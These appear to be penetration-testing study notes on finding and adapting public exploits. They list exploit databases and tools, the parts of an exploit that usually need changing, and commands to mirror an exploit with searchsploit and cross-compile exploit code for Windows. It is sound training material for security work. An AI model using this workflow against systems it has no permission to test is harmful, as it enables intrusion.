Public exploits

Exploit Sources

Online exploit sources

• Exploit Database

• SecurityFocus Exploit Archives

• Packet Storm

Offline exploit resources

• Searchsploit

• Nmap NSE scripts

• The Browser Exploitation Framework (BEEF)

• Metasploit

Fixing exploits

When using publicly available exploits it is rare that these exploits will work without at least some minor modifications. Others may require more extensive modifications such as updating the payload.

Importing and examining exploits

• Searchploit includes a mirror function that will copy an exploit into the current working directory searchsploit -m 43321

• Headers such as 'winsock' are hints that c programs were intended for compilation on windows and require cross-compilation

Items that commonly require modification

• Target IP address and port

• Attacking machine IP address and port

• Return address for memory corruption exploits

• Payload (typically generated with msfvenom)

Cross compiling exploit code

• mingw-w64 is a popular cross compiler available on Linux

• install mingw using sudo apt install mingw-w64

• After installation, mingw-w64 can be used to compile Windows PE files

  • i686-w64-mingw32-gcc 42341.c -o syncbreeze.exe

Fixing web exploits

There are several additional consideration for modifying web exploits

• Does the exploit initiate an HTTP or HTTPS connection?

• Does the exploit access a web application through a specific path or route?

• Does the exploit leverage a pre-authentication vulnerability, or are credentials required?

• How are the GET and POST requests crafted to trigger and exploit the vulnerability?

• Does the exploit rely on default application settings that might have been changed at install?

• Will oddities such as self-signed certificates disrupt the exploit?